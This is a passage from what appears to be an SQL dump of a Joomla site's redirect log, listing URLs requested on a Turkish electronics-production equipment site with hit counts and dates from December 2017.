00:00:00',301),(15472,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer?language=tr-tr',NULL,'','',31,0,'2017-12-05 20:23:45','0000-00-00 00:00:00',301),(15473,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-05 20:34:08','0000-00-00 00:00:00',301),(15474,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-05 20:34:20','0000-00-00 00:00:00',301),(15475,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-05 20:46:46','0000-00-00 00:00:00',301),(15476,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-05 20:53:47','0000-00-00 00:00:00',301),(15477,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering/results,1-10',NULL,'','',1,0,'2017-12-05 21:14:01','0000-00-00 00:00:00',301),(15478,'http://www.3s-technologies.com.tr/en/products/bã¶lgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2017-12-05 22:04:50','0000-00-00 00:00:00',301),(15479,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-40',NULL,'','',2,0,'2017-12-05 22:20:30','0000-00-00 00:00:00',301),(15480,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-05 22:28:41','0000-00-00 00:00:00',301),(15481,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,`p`.product_sku',NULL,'','',2,0,'2017-12-05 22:52:38','0000-00-00 00:00:00',301),(15482,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',200,0,'2017-12-05 23:34:08','0000-00-00 00:00:00',301),(15483,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',42,0,'2017-12-05 23:51:34','0000-00-00 00:00:00',301),(15484,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-05 23:57:34','0000-00-00 00:00:00',301),(15485,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-100',NULL,'','',3,0,'2017-12-06 00:31:24','0000-00-00 00:00:00',301),(15486,'http://3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-12-06 00:52:53','0000-00-00 00:00:00',301),(15487,'http://3s-technologies.com.tr/tr/?option=com_user&view=register',NULL,'','',39,0,'2017-12-06 01:12:53','0000-00-00 00:00:00',301),(15488,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-06 01:29:48','0000-00-00 00:00:00',301),(15489,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/dirdesc/results,1-5',NULL,'','',5,0,'2017-12-06 01:53:23','0000-00-00 00:00:00',301),(15490,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name?language=tr-tr',NULL,'','',10,0,'2017-12-06 01:54:21','0000-00-00 00:00:00',301),(15491,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,mf_name/results,1-50',NULL,'','',8,0,'2017-12-06 02:09:34','0000-00-00 00:00:00',301),(15492,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-5',NULL,'','',5,0,'2017-12-06 02:17:45','0000-00-00 00:00:00',301),(15493,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-06 02:50:55','0000-00-00 00:00:00',301),(15494,'http://3s-technologies.com.tr/en/products/manufacturer/tolo',NULL,'','',25,0,'2017-12-06 02:58:59','0000-00-00 00:00:00',301),(15495,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-12-06 03:25:56','0000-00-00 00:00:00',301),(15496,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/dirdesc/results,1-10',NULL,'','',6,0,'2017-12-06 03:55:56','0000-00-00 00:00:00',301),(15497,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',8,0,'2017-12-06 04:07:56','0000-00-00 00:00:00',301),(15498,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',55,0,'2017-12-06 04:12:28','0000-00-00 00:00:00',301),(15499,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-06 04:26:20','0000-00-00 00:00:00',301),(15500,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_name/dirdesc',NULL,'','',8,0,'2017-12-06 04:26:37','0000-00-00 00:00:00',301),(15501,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',1,0,'2017-12-06 04:49:07','0000-00-00 00:00:00',301),(15502,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-06 04:56:58','0000-00-00 00:00:00',301),(15503,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/joomla/index.php/fr/iletisim-2?format=feed&type=rss',NULL,'','',8,0,'2017-12-06 06:33:07','0000-00-00 00:00:00',301),(15504,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-06 06:54:26','0000-00-00 00:00:00',301),(15505,'http://www.3s-technologies.com.tr/tr/anasayfa',NULL,'','',85,0,'2017-12-06 07:12:01','0000-00-00 00:00:00',301),(15506,'http://3s-technologies.com.tr/index.php/en/products/spr-20-41-42-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-06 07:17:23','0000-00-00 00:00:00',301),(15507,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-06 07:24:54','0000-00-00 00:00:00',301),(15508,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',55,0,'2017-12-06 07:43:27','0000-00-00 00:00:00',301),(15509,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',221,0,'2017-12-06 08:00:21','0000-00-00 00:00:00',301),(15510,'http://3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc/results,1-50',NULL,'','',11,0,'2017-12-06 08:34:06','0000-00-00 00:00:00',301),(15511,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/sp18_250x250.jpg',NULL,'','',8,0,'2017-12-06 10:15:15','0000-00-00 00:00:00',301),(15512,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-12-06 10:59:24','0000-00-00 00:00:00',301),(15513,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-12-06 11:19:19','0000-00-00 00:00:00',301),(15514,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',205,0,'2017-12-06 11:35:54','0000-00-00 00:00:00',301),(15515,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/jvk-detail',NULL,'','',35,0,'2017-12-06 12:31:32','0000-00-00 00:00:00',301),(15516,'http://3s-technologies.com.tr/en/products/e-bar-detail?tmpl=component&print=1',NULL,'','',13,0,'2017-12-06 12:38:08','0000-00-00 00:00:00',301),(15517,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-12-06 12:57:45','0000-00-00 00:00:00',301),(15518,'http://3s-technologies.com.tr/index.php/en/products/rh2-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-06 12:59:35','0000-00-00 00:00:00',301),(15519,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-06 13:02:19','0000-00-00 00:00:00',301),(15520,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-5',NULL,'','',8,0,'2017-12-06 13:04:05','0000-00-00 00:00:00',301),(15521,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name',NULL,'','',8,0,'2017-12-06 13:14:23','0000-00-00 00:00:00',301),(15522,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-06 13:19:24','0000-00-00 00:00:00',301),(15523,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',15,0,'2017-12-06 13:29:04','0000-00-00 00:00:00',301),(15524,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',260,0,'2017-12-06 13:30:43','0000-00-00 00:00:00',301),(15525,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-06 13:43:55','0000-00-00 00:00:00',301),(15526,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,mf_name?language=en-gb',NULL,'','',12,0,'2017-12-06 13:44:47','0000-00-00 00:00:00',301),(15527,'http://3s-technologies.com.tr/tr/urunler/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-12-06 13:57:44','0000-00-00 00:00:00',301),(15528,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/trident-detail',NULL,'','',1,0,'2017-12-06 13:58:57','0000-00-00 00:00:00',301),(15529,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-06 14:07:49','0000-00-00 00:00:00',301),(15530,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-06 14:08:08','0000-00-00 00:00:00',301),(15531,'http://3s-technologies.com.tr/index.php/en/products/ls60v-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-06 14:11:32','0000-00-00 00:00:00',301),(15532,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku',NULL,'','',1,0,'2017-12-06 14:17:55','0000-00-00 00:00:00',301),(15533,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?error=404&language=en-gb',NULL,'','',1,0,'2017-12-06 14:22:39','0000-00-00 00:00:00',301),(15534,'https://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2017-12-06 14:25:20','0000-00-00 00:00:00',301),(15535,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name',NULL,'','',5,0,'2017-12-06 14:26:05','0000-00-00 00:00:00',301),(15536,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-06 14:31:44','0000-00-00 00:00:00',301),(15537,'http://3s-technologies.com.tr/index.php/en/products/ess-310-24-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-12-06 14:32:40','0000-00-00 00:00:00',301),(15538,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',14,0,'2017-12-06 14:38:01','0000-00-00 00:00:00',301),(15539,'http://3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',21,0,'2017-12-06 14:40:05','0000-00-00 00:00:00',301),(15540,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',2,0,'2017-12-06 14:40:10','0000-00-00 00:00:00',301),(15541,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,category_name?language=tr-tr',NULL,'','',24,0,'2017-12-06 14:41:50','0000-00-00 00:00:00',301),(15542,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',4,0,'2017-12-06 14:49:05','0000-00-00 00:00:00',301),(15543,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/kester',NULL,'','',33,0,'2017-12-06 14:51:26','0000-00-00 00:00:00',301),(15544,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,mf_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-06 15:29:35','0000-00-00 00:00:00',301),(15545,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-06 15:37:25','0000-00-00 00:00:00',301),(15546,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',227,0,'2017-12-06 15:39:36','0000-00-00 00:00:00',301),(15547,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',1,0,'2017-12-06 15:44:13','0000-00-00 00:00:00',301),(15548,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-06 15:47:37','0000-00-00 00:00:00',301),(15549,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-06 15:49:05','0000-00-00 00:00:00',301),(15550,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name',NULL,'','',4,0,'2017-12-06 15:49:58','0000-00-00 00:00:00',301),(15551,'http://3s-technologies.com.tr/index.php/tr/ueruenler/avb-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-06 15:53:28','0000-00-00 00:00:00',301),(15552,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,product_sku?language=tr-tr',NULL,'','',23,0,'2017-12-06 15:56:08','0000-00-00 00:00:00',301),(15553,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',215,0,'2017-12-06 15:57:56','0000-00-00 00:00:00',301),(15554,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-20',NULL,'','',4,0,'2017-12-06 16:04:05','0000-00-00 00:00:00',301),(15555,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/most-read/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-12-06 16:58:19','0000-00-00 00:00:00',301),(15556,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,ordering?language=tr-tr',NULL,'','',13,0,'2017-12-06 17:23:48','0000-00-00 00:00:00',301),(15557,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,mf_name?language=en-gb',NULL,'','',11,0,'2017-12-06 17:24:51','0000-00-00 00:00:00',301),(15558,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name?language=tr-tr',NULL,'','',3,0,'2017-12-06 17:55:05','0000-00-00 00:00:00',301),(15559,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',33,0,'2017-12-06 18:05:50','0000-00-00 00:00:00',301),(15560,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-06 18:19:05','0000-00-00 00:00:00',301),(15561,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_name?language=en-gb',NULL,'','',15,0,'2017-12-06 18:44:51','0000-00-00 00:00:00',301),(15562,'http://3s-technologies.com.tr/index.php/tr/ueruenler/245-sn63pb37-0.4mm-29-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-06 18:59:01','0000-00-00 00:00:00',301),(15563,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',46,0,'2017-12-06 19:16:56','0000-00-00 00:00:00',301),(15564,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-10',NULL,'','',1,0,'2017-12-06 20:23:14','0000-00-00 00:00:00',301),(15565,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,ordering/results,1-10',NULL,'','',4,0,'2017-12-06 20:48:44','0000-00-00 00:00:00',301),(15566,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-07 00:40:59','0000-00-00 00:00:00',301),(15567,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-28-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-07 01:17:46','0000-00-00 00:00:00',301),(15568,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-07 01:40:54','0000-00-00 00:00:00',301),(15569,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',234,0,'2017-12-07 01:41:05','0000-00-00 00:00:00',301),(15570,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-37-detail',NULL,'','',8,0,'2017-12-07 02:40:53','0000-00-00 00:00:00',301),(15571,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',244,0,'2017-12-07 02:50:43','0000-00-00 00:00:00',301),(15572,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim',NULL,'','',4,0,'2017-12-07 02:51:26','0000-00-00 00:00:00',301),(15573,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer',NULL,'','',3,0,'2017-12-07 02:52:19','0000-00-00 00:00:00',301),(15574,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',2,0,'2017-12-07 02:52:23','0000-00-00 00:00:00',301),(15575,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/smd-orta-hızlı',NULL,'','',3,0,'2017-12-07 02:53:58','0000-00-00 00:00:00',301),(15576,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',1,0,'2017-12-07 02:57:40','0000-00-00 00:00:00',301),(15577,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name',NULL,'','',1,0,'2017-12-07 03:20:36','0000-00-00 00:00:00',301),(15578,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-12-07 03:22:32','0000-00-00 00:00:00',301),(15579,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,ordering/results,1-20',NULL,'','',5,0,'2017-12-07 03:31:48','0000-00-00 00:00:00',301),(15580,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/smd-fırın',NULL,'','',1,0,'2017-12-07 03:32:39','0000-00-00 00:00:00',301),(15581,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole',NULL,'','',7,0,'2017-12-07 03:50:33','0000-00-00 00:00:00',301),(15582,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',1,0,'2017-12-07 04:13:21','0000-00-00 00:00:00',301),(15583,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız?language=en-gb',NULL,'','',1,0,'2017-12-07 04:14:08','0000-00-00 00:00:00',301),(15584,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-ultra-hız',NULL,'','',1,0,'2017-12-07 04:14:20','0000-00-00 00:00:00',301),(15585,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',58,0,'2017-12-07 04:20:50','0000-00-00 00:00:00',301),(15586,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',5,0,'2017-12-07 04:22:11','0000-00-00 00:00:00',301),(15587,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',247,0,'2017-12-07 04:31:01','0000-00-00 00:00:00',301),(15588,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',238,0,'2017-12-07 04:36:58','0000-00-00 00:00:00',301),(15589,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-5',NULL,'','',7,0,'2017-12-07 04:43:47','0000-00-00 00:00:00',301),(15590,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',9,0,'2017-12-07 05:00:30','0000-00-00 00:00:00',301),(15591,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-07 05:36:49','0000-00-00 00:00:00',301),(15592,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-07 05:39:23','0000-00-00 00:00:00',301),(15593,'http://www.3s-technologies.com.tr/en/products/smd-dã¼åÿã¼k-hä±zlä±/le-40v-detail/askquestion?tmpl=component',NULL,'','',1,0,'2017-12-07 05:39:57','0000-00-00 00:00:00',301),(15594,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/245-sn63pb37-0.8mm-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-12-07 05:42:33','0000-00-00 00:00:00',301),(15595,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',6,0,'2017-12-07 05:54:07','0000-00-00 00:00:00',301),(15596,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-10',NULL,'','',5,0,'2017-12-07 05:55:47','0000-00-00 00:00:00',301),(15597,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-12-07 06:23:33','0000-00-00 00:00:00',301),(15598,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-07 06:43:35','0000-00-00 00:00:00',301),(15599,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by?category_name&language=en-gb',NULL,'','',1,0,'2017-12-07 06:46:01','0000-00-00 00:00:00',301),(15600,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-12-07 06:53:23','0000-00-00 00:00:00',301),(15601,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-20',NULL,'','',9,0,'2017-12-07 07:07:47','0000-00-00 00:00:00',301),(15602,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-07 07:28:08','0000-00-00 00:00:00',301),(15603,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/sp-18p-l-detail',NULL,'','',35,0,'2017-12-07 07:28:58','0000-00-00 00:00:00',301),(15604,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-07 08:08:33','0000-00-00 00:00:00',301),(15605,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-07 08:17:21','0000-00-00 00:00:00',301),(15606,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-12-07 08:19:47','0000-00-00 00:00:00',301),(15607,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',9,0,'2017-12-07 09:10:48','0000-00-00 00:00:00',301),(15608,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',5,0,'2017-12-07 09:17:23','0000-00-00 00:00:00',301),(15609,'http://3s-technologies.com.tr/en/wp-content/plugins/delete-all-comments/readme.txt',NULL,'3s-technologies.com.tr','',1,0,'2017-12-07 09:37:04','0000-00-00 00:00:00',301),(15610,'http://www.3s-technologies.com.tr/index.php/en/products/cs40-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-07 09:47:11','0000-00-00 00:00:00',301),(15611,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',2,0,'2017-12-07 10:04:38','0000-00-00 00:00:00',301),(15612,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-07 10:11:43','0000-00-00 00:00:00',301),(15613,'https://www.3s-technologies.com.tr/tr/urunler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-07 10:12:10','0000-00-00 00:00:00',301),(15614,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/fr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=188',NULL,'','',1,0,'2017-12-07 10:12:46','0000-00-00 00:00:00',301),(15615,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-07 10:12:53','0000-00-00 00:00:00',301),(15616,'https://www.3s-technologies.com.tr/tr/urunler/manufacturers/mirae',NULL,'','',1,0,'2017-12-07 10:12:57','0000-00-00 00:00:00',301),(15617,'https://www.3s-technologies.com.tr/en/products/cm-602-l-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-07 10:14:43','0000-00-00 00:00:00',301),(15618,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/fr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=193',NULL,'','',1,0,'2017-12-07 10:16:45','0000-00-00 00:00:00',301),(15619,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,mf_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-07 10:18:12','0000-00-00 00:00:00',301),(15620,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/dirdesc/results,1-40',NULL,'','',3,0,'2017-12-07 10:41:34','0000-00-00 00:00:00',301),(15621,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-07 11:00:02','0000-00-00 00:00:00',301),(15622,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-07 11:00:20','0000-00-00 00:00:00',301),(15623,'http://3s-technologies.com.tr/index.php/en/products/mx200lp-3-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-12-07 11:01:38','0000-00-00 